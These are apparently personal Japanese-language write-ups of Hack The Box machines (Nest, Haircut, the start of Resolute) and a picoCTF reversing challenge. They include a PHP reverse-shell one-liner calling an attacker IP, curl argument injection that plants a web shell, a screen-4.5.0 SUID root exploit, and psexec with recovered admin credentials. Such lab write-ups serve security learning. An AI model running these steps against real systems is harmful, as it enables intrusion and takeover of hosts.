Hack The Box Nest
Nest
Sweets
Procedure
nmap
PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command>
4386/tcp
4386/tcpはHQK Reporting Service V1.2というサービスが走っているらしい。何のサービスやコマンドは不明
$ nc 10.10.10.178 4386
HQK Reporting Service V1.2
>help
telnetコマンドで繋ぐと返ってくる。
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
改行コードが違うのかな?
smbclient
smbclient -L 10.10.10.178 Enter WORKGROUP\ubu's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk
認証情報なしでは、SecureとUsersの下の閲覧権限がない。Users下のディレクトリは見えた。
smbclient \\\\10.10.10.178\\Data smb: \> mget * NT_STATUS_ACCESS_DENIED listing \IT\* NT_STATUS_ACCESS_DENIED listing \Production\* NT_STATUS_ACCESS_DENIED listing \Reports\* getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (1.1 KiloBytes/sec) (average 0.6 KiloBytes/sec)
recon download file
cat Shared/Templates/HR/Welcome\ Email.txt We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you
TempUserのパスワードが手に入った。
smbclient with Tempuser
入手できたファイルが増えた。
$ tree
.
├── IT
│ ├── Archive
│ ├── Configs
│ │ ├── Adobe
│ │ │ ├── editing.xml
│ │ │ ├── Options.txt
│ │ │ ├── projects.xml
│ │ │ └── settings.xml
│ │ ├── Atlas
│ │ │ └── Temp.XML
│ │ ├── DLink
│ │ ├── Microsoft
│ │ │ └── Options.xml
│ │ ├── NotepadPlusPlus
│ │ │ ├── config.xml
│ │ │ └── shortcuts.xml
│ │ ├── RU Scanner
│ │ │ └── RU_config.xml
│ │ └── Server Manager
│ ├── Installs
│ ├── Reports
│ └── Tools
├── Production
├── Reports
└── Shared
├── Maintenance
│ └── Maintenance Alerts.txt
└── Templates
├── HR
│ └── Welcome Email.txt
└── Marketing
20 directories, 11 files
パスワードが記入されたファイルを発見した。おそらくbase64デコードされたものだろう。
$ cat RU\ Scanner/RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
base64デコードしてログインを試みたが、失敗する。
$ smbclient \\\\10.10.10.178\\Data -U C.Smith
Enter WORKGROUP\C.Smith's password:
session setup failed: NT_STATUS_LOGON_FAILURE
ディレクトリ構造が描かれたファイルも発見した。
$ cat IT/Configs/NotepadPlusPlus/config.xml
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
smbclient secure$ secure$の方に入ってみる。
$ smbclient \\\\10.10.10.178\\Secure$ -U TempUser Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Aug 8 08:08:12 2019 .. D 0 Thu Aug 8 08:08:12 2019 Finance D 0 Thu Aug 8 04:40:13 2019 HR D 0 Thu Aug 8 08:08:11 2019 IT D 0 Thu Aug 8 19:59:25 2019
どうも、3つのディレクトリに権限がないらしい。
smb: \> recurse smb: \> ls * . D 0 Thu Aug 8 08:08:12 2019 .. D 0 Thu Aug 8 08:08:12 2019 Finance D 0 Thu Aug 8 04:40:13 2019 HR D 0 Thu Aug 8 08:08:11 2019 IT D 0 Thu Aug 8 19:59:25 2019 \Finance NT_STATUS_ACCESS_DENIED listing \Finance\* \HR NT_STATUS_ACCESS_DENIED listing \HR\* \IT NT_STATUS_ACCESS_DENIED listing \IT\*
Dataの共有フォルダでITの下にCarlディレクトリがあるようだったのでアクセスしてみる。
smb: \IT\> cd Carl smb: \IT\Carl\> ls . D 0 Thu Aug 8 04:42:14 2019 .. D 0 Thu Aug 8 04:42:14 2019 Docs D 0 Thu Aug 8 04:44:00 2019 Reports D 0 Tue Aug 6 22:45:40 2019 VB Projects D 0 Tue Aug 6 23:41:55 2019 10485247 blocks of size 4096. 6545549 blocks available smb: \IT\Carl\> recurse smb: \IT\Carl\> prompt smb: \IT\Carl\> mget * getting file \IT\Carl\Docs\ip.txt of size 56 as ip.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \IT\Carl\Docs\mmc.txt of size 73 as mmc.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.9 KiloBytes/sec) (average 0.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Module1.vb of size 279 as Module1.vb (0.7 KiloBytes/sec) (average 0.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.Designer.vb of size 441 as Application.Designer.vb (1.2 KiloBytes/sec) (average 0.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.myapp of size 481 as Application.myapp (1.3 KiloBytes/sec) (average 0.9 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\AssemblyInfo.vb of size 1163 as AssemblyInfo.vb (3.1 KiloBytes/sec) (average 1.2 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.Designer.vb of size 2776 as Resources.Designer.vb (7.3 KiloBytes/sec) (average 2.0 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.resx of size 5612 as Resources.resx (14.9 KiloBytes/sec) (average 3.4 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.Designer.vb of size 2989 as Settings.Designer.vb (7.7 KiloBytes/sec) (average 3.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.settings of size 279 as Settings.settings (0.7 KiloBytes/sec) (average 3.6 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj of size 4828 as RU Scanner.vbproj (13.0 KiloBytes/sec) (average 4.3 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj.user of size 143 as RU Scanner.vbproj.user (0.4 KiloBytes/sec) (average 4.0 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\SsoIntegration.vb of size 133 as SsoIntegration.vb (0.4 KiloBytes/sec) (average 3.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Utils.vb of size 4888 as Utils.vb (12.9 KiloBytes/sec) (average 4.4 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner.sln of size 871 as RUScanner.sln (2.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)`
ファイルが取得できた。 中を見ていくと、Util.vbに暗号化と複合化のコードがある。さっき手に入れたパスワードっぽい文字列は暗号化しているのかも。
Imports System.Text Imports System.Security.Cryptography Public Class Utils Public Shared Function GetLogFilePath() As String Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt") End Function Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
"464R5DFA5DL6LE28"でググると、ここが見つかった。誰かが描いてくれたんかな。もしかしたらこのBOXの回答者かも。複合化されたパスワード(xRxRxPANCAK3SxRxRx)が手に入る。
smbclient
入手したクレデンシャルで最再度smbログインを行う。
$ smbclient \\\\10.10.10.178\\Users -U C.Smith Enter WORKGROUP\C.Smith's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jan 26 08:04:21 2020 .. D 0 Sun Jan 26 08:04:21 2020 Administrator D 0 Sat Aug 10 00:08:23 2019 C.Smith D 0 Sun Jan 26 16:21:44 2020 L.Frost D 0 Fri Aug 9 02:03:01 2019 R.Thompson D 0 Fri Aug 9 02:02:50 2019 TempUser D 0 Thu Aug 8 07:55:56 2019 cd 10485247 blocks of size 4096. 6545661 blocks available smb: \> cd C.Smith\ C.Smith\HQK Reporting\ C.Smith\user.txt smb: \> cd C.Smith\ smb: \C.Smith\> get user.txt getting file \C.Smith\user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
get user flag !!
admin flag
dir walk HqkLdap.exeは.netの実行ファイル。LDAPのqueryや暗号化の処理が書いてあった。 UsersのC.Smithのディレクトリ下にdebugモードのパスワードなどがあるが、中身は空っぽ、、、うーん怪しい。
├── HQK Reporting │ ├── AD Integration Module │ │ └── HqkLdap.exe │ ├── Debug Mode Password.txt │ └── HQK_Config_Backup.xml └── user.txt
allinfoコマンドを叩いてみる。
smb: \C.Smith\> allinfo "HQK Reporting\Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: 金 8月 9 08時06分12秒 2019 JST access_time: 金 8月 9 08時06分12秒 2019 JST write_time: 金 8月 9 08時08分17秒 2019 JST change_time: 金 8月 9 08時08分17秒 2019 JST attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes
ADSにPasswordの文字列を発見。
smb: \C.Smith\> more "HQK Reporting\Debug Mode Password.txt:Password" WBQ201953D8w
debug用のパスワード(WBQ201953D8w)が手に入った。
4386/tcp
先ほど入手したパスワードを4386/tcpのサービスに入れてみる。
telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >debug WBQ201953D8w Debug mode enabled. Use the HELP command to view additional commands that are now available >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID>
コマンドが増えた!!
setdirでカレンとディレクトリを指定できて、showqueryでファイル内容が表示できる模様。Administratorのパスワードが手に入る。
>setdir C:\Program Files\HQK Current directory set to HQK >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK_Config.xml Current Directory: HQK >set dir LDAP Unrecognised command >setdir LDAP Current directory set to LDAP >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [1] HqkLdap.exe [2] Ldap.conf Current Directory: LDAP >showquery 2 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
先程の .NET Fiddleで複合化を施行するも複合できない。 exeにあった情報で複合するのがいいっぽい。 今度は自分でちゃんとやったwでコンパイルしたコードにメイン関数を追加しただけw
パスワード(XtH4nkS4Pl4y1nGX)が手に入った!!
impacketのpsexecを使う
$ python3 /opt/impacket/examples/psexec.py administrator:XtH4nkS4Pl4y1nGX@10.10.10.178 Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation [*] Requesting shares on 10.10.10.178..... [*] Found writable share ADMIN$ [*] Uploading file aeexaNwJ.exe [*] Opening SVCManager on 10.10.10.178..... [*] Creating service gTVc on 10.10.10.178..... [*] Starting service gTVc..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
no crypto picoMini 2021 by redpwn
no crypto 150point
Description
there's crypto in here but the challenge is not crypto... 🤔
Solution
run binary
./not-crypto I heard you wanted to bargain for a flag... whatcha got? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Nope, come back later
標準入力でフラグを入力させるタイプのようだ。
open with ghidra
memcpy関数で結果の成否を判別している。
iVar24 = memcmp(local_88,local_198,0x40); if (iVar24 == 0) { puts("Yep, that\'s it!"); } else { iVar24 = 1; puts("Nope, come back later"); }
open with ghidra
memcpy関数で結果の成否を判別している。
iVar24 = memcmp(local_88,local_198,0x40); if (iVar24 == 0) { puts("Yep, that\'s it!"); } else { iVar24 = 1; puts("Nope, come back later"); }
run with gdb
memcpy関数にブレークポイントを置いて実行ファイルを動かす。
gdb-peda$ b memcmp Breakpoint 1 at 0x1060 gdb-peda$ run Starting program: /home/ubu/nh/ctf/not-crypto I heard you wanted to bargain for a flag... whatcha got? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [----------------------------------registers-----------------------------------] RAX: 0x10 RBX: 0x7fffffffdea0 --> 0x7fffffffdec6 --> 0x555555555c700000 ('') RCX: 0xa4 RDX: 0x40 ('@') RSI: 0x7fffffffdd50 ('a' <repeats 64 times>, "\367l\214\377\\\207/\216\236C\236Ԙ2l\034\325<\020\271\211\273?7\027\370\241\343\217\312\315\377\243\201\006\312*:9\375=\302\230\036\262\bU\341\227}\376\375\275", <incomplete sequence \307>) RDI: 0x7fffffffde60 ("picoCTF{c0mp1l3r_0pt1m1z4t10n_15_pur3_w1z4rdry_but_n0_pr0bl3m?}\n\306\336\377\377\377\177") RBP: 0xa1 RSP: 0x7fffffffdcd8 --> 0x5555555553be (mov r12d,eax) RIP: 0x7ffff7f47c50 (<__memcmp_avx2_movbe>: endbr64) R8 : 0xba R9 : 0x96 R10: 0x55555555451b --> 0x5f00706d636d656d ('memcmp') R11: 0x7ffff7f47c50 (<__memcmp_avx2_movbe>: endbr64) R12: 0x97 R13: 0x73 ('s') R14: 0xf9 R15: 0x3a (':') EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
比較する文字列であるフラグのアドレスがRDIに格納されている。
Flag
得られたフラグで実行ファイルを動かす。
./not-crypto
I heard you wanted to bargain for a flag... whatcha got?
picoCTF{c0mp1l3r_0pt1m1z4t10n_15_pur3_w1z4rdry_but_n0_pr0bl3m?}
Yep, that's it!
Hack The Box Haircut
Haircut
Sweets
- OWASPのdirbusterのリストは優秀
- webサーバで使用されているコマンドや構造を把握することが大事
Procedure
portscan
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA) | 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA) |_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519) 80/tcp open http nginx 1.10.0 (Ubuntu) |_http-server-header: nginx/1.10.0 (Ubuntu) |_http-title: HTB Hairdresser
web enum
- dirb uploadsディレクトリとtest.htmlが見つかるが特に情報なし
- nikto 同上
- ZAP Forced Browse 同上
dirsearch 残存ファイルが見つかる
python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.24/ -e sh,php,html -w ~/.ZAP/fuzzers/dirbuster/directory-list-1.0.txt -f [16:48:45] Starting: [16:48:52] 200 - 446B - /exposed.php [16:49:24] 200 - 144B - /index.html [16:51:12] 200 - 141B - /hair.html [16:52:24] 200 - 223B - /test.html [16:54:44] 301 - 194B - /uploads -> http://10.10.10.24/uploads/ [16:54:44] 403 - 580B - /uploads/
-
フォームで渡したURLのコンテンツを読み込むよう curlコマンドでリンク先ファイルを取得しているようだ。
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 28 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded Referer: http://10.10.10.24/exposed.php formurl=sleep%2010&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 05 May 2021 08:44:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Length: 1578 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:02 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:07 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:08 --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: sleep 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (7) Could not resolve host: sleep </span> </body> </html>
直接のPHPでのコード実行は失敗
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 64 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded Referer: http://10.10.10.24/exposed.php formurl=http%3A%2F%2F10.10.14.2%3A12345%2FcmdShell.php&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 05 May 2021 09:07:42 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Length: 822 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 34 100 34 0 0 89 0 --:--:-- --:--:-- --:--:-- 89 <?php system('ls'); exec('ls'); ?> </span> </body> </html>
curlコマンドの-oオプションでphpファイルのアップロードを試みる
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 80 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.24/exposed.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close formurl=http%3A%2F%2F10.10.15.3%3A12345%2FcmdShell.php+-o+cmdShell.php&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Sun, 09 May 2021 01:40:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 897 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file cmdShell.php: Permission denied 100 347 100 347 0 0 2124 0 --:--:-- --:--:-- --:--:-- 2128 curl: (23) Failed writing body (0 != 347) </span> </body> </html>
"Failed writing body"から書き込みに失敗している様子。 dirsearchで見つけたuploadsディレクトリには書き込み可能かもしれない。
POST /exposed.php HTTP/1.1 Host: 10.10.10.24 Content-Length: 94 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.24 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.24/exposed.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close formurl=http%3A%2F%2F10.10.15.3%3A12345%2FcmdShell.php+-o+.%2Fuploads%2FcmdShell.php&submit=Go HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Sun, 09 May 2021 01:51:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 788 <html> <head> <title>Hairdresser checker</title> </head> <body> <form action='exposed.php' method='POST'> <span> <p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p> </span> <input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/> <input type='submit' name='submit' value='Go' id='submit' /> </form> <span> <p>Requesting Site...</p> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 347 100 347 0 0 1119 0 --:--:-- --:--:-- --:--:-- 1122 </span> </body> </html>
!!web shell uploading Done!!
自端末でリスナーを作成
$ nc -lnvp 4444
web shellからリバースシェルを取得する
php -r '$sock=fsockopen("10.10.15.3",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
!!Get User Flag!!
local enum mysqlサーバがはしっている
$ netstat -lnt Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp6 0 0 :::80 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN
linpeas
[SNIP] [+] SUID - Check easy privesc, exploits and write perms [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 1.6M May 19 2017 /usr/bin/screen-4.5.0 [SNIP]
screen-4.5.0という実行ファイルにSUIDがついているよう。 screen-4.5.0でググるとExploit DBにExploit codeが見つかる。
exploit実行
$ chmod +x 41154.sh $ sh ./41154.sh ~ gnu/screenroot ~ [+] First, we create our shell and library...
shを叩くも、うまく実行できていなさそう。
ここで失敗している。
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
仕方がないので、攻撃端末でビルドしたものをアップロードする。 その後、Exploitコードをそのまま実行する。
$ cd /etc $ umask 000 $ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" $ screen -ls ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! No Sockets found in /tmp/screens/S-www-data. $ /tmp/rootshell whoami root
Get Root Shell
Hack The Box Resolute
Resolute
tags: HTB
Medium
Procedure
User Flag
nmap
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-09 01:19:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49709/tcp open msrpc Microsoft Windows RPC 62192/tcp open tcpwrapped 63729/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.60%E=4%D=5/9%OT=53%CT=1%CU=37102%PV=Y%DS=2%DC=I%G=Y%TM=5EB603E2 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=O%TS=A) OS:SEQ(SP=101%GCD=1%ISR=108%TI=I%CI=RD%TS=A)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%TS OS:=A)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M OS:54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20 OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A= OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0 OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1 OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI OS:=N%T=80%CD=Z) Network Distance: 2 hops Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
ADのWindows Serverっぽい。
nmap script
$ sudo nmap -p445 --script smb-enum-shares,smb-enum-users 10.10.10.169 Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-09 10:38 JST PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED) | account_used: <blank> | \\10.10.10.169\ADMIN$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.169\C$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.169\IPC$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: READ | \\10.10.10.169\NETLOGON: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED |_ Anonymous access: <none> | smb-enum-users: | MEGABANK\abigail (RID: 6602) | Flags: Normal user account | MEGABANK\Administrator (RID: 500) | Description: Built-in account for 